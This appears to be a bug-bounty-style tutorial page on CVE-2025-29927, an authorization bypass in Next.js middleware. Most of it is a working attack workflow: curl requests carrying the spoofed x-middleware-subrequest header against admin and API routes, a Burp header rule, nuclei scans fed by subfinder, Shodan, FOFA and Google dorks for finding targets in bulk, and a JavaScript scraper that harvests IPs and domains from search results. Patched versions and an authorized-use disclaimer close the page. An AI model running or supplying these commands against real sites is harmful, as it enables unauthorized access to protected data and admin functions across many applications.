Loading...
CVE-2025-29927 - Authorization bypass via x-middleware-subrequest
Middleware in Next.js intercepts incoming HTTP requests and processes them before they reach the final route handler. It is commonly used for authentication & authorization (checking if a user is logged in), logging & monitoring (tracking requests for analytics), and request modification (altering headers or query parameters).
CVE-2025-29927 is a critical authorization bypass vulnerability in Next.js middleware. By sending a specially crafted header, attackers can bypass all middleware checks and gain unauthorized access to protected routes.
export function middleware(req) {
if (!req.cookies.token) {
return new Response('Unauthorized', { status: 401 });
}
return NextResponse.next();
}curl -H "x-middleware-subrequest: middleware:middleware:middleware" https://target.com/dashboardBefore exploiting, you need to identify if the target is using Next.js and has vulnerable middleware. Use nuclei templates or manual probing.
echo target.com | nuclei -t nuclei-templates/http/cves/2025/CVE-2025-29927.yamlsubfinder -d target.com -all | nuclei -t nuclei-templates/http/cves/2025/CVE-2025-29927.yamlcat domains.txt | uro | nuclei -t nuclei-templates/http/cves/2025/CVE-2025-29927.yamlOnce you've identified a vulnerable target, exploit the authorization bypass to access protected routes. The vulnerability works by spoofing the x-middleware-subrequest header.
curl -v https://target.com/dashboardcurl -H "x-middleware-subrequest: middleware:middleware:middleware" https://target.com/dashboardcurl -H "x-middleware-subrequest: middleware:middleware:middleware" https://target.com/api/admincurl -H "x-middleware-subrequest: middleware:middleware:middleware" -H "Cookie: session=valid" https://target.com/adminBurp Suite provides a graphical interface for testing the vulnerability. Add the malicious header to intercept and modify requests.
x-middleware-subrequest: middleware:middleware:middleware:middlewareEnable Proxy > Options > Match and Replace > Add headerFor mass hunting, use Shodan to find servers potentially running vulnerable Next.js. Search for the x-middleware-rewrite header which indicates Next.js is in use.
x-middleware-rewritehttp.html:"/_next/static"cpe:"cpe:2.3:a:zeit:next.js"var ipElements=document.querySelectorAll('strong'),ips=[],domains=[];ipElements.forEach(function(e){var t=e.innerHTML.replace(/['"]/g,'').trim();/^(\d{1,3}\.){3}\d{1,3}$/.test(t)?ips.push(t):/^(?!\d+\.)[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}$/.test(t)&&domains.push(t)});var dataString='IPs:\n'+ips.join('\n')+'\n\nDomains:\n'+domains.join('\n'),a=document.createElement('a');a.href='data:text/plain;charset=utf-8,'+encodeURIComponent(dataString);a.download='domains.txt';document.body.appendChild(a);a.click();cat domains.txt | uro | nuclei -t nuclei-templates/http/cves/2025/CVE-2025-29927.yamlUse these dorks to discover potentially vulnerable Next.js applications through search engines.
shodan search: x-middleware-rewriteshodan search: http.html:"/_next/static"fofa: body="/_next/static" AND "x-middleware-rewrite"google: inurl:"/_next" AND intext:"next.config.js" OR intext:"Powered by Next.js"inurl:"/_next" AND intext:"next.config.js"This vulnerability has critical impact as it allows unauthorized access to any route protected by middleware. In severe cases, attackers can compromise the entire application.
Unauthorized Data Access: View private user informationPrivilege Escalation: Gain administrative access without credentialsApplication Takeover: Complete compromise in severe casesNext.js has released patches for all affected versions. Update to the latest version to remediate this vulnerability.
Next.js 15.x: Upgrade to 15.2.3 or laterNext.js 14.x: Upgrade to 14.2.25 or laterNext.js 13.x: Upgrade to 13.5.9 or laterNext.js 12.x: Upgrade to 12.3.5 or laterFor educational and authorized testing purposes only. Always obtain proper authorization before testing.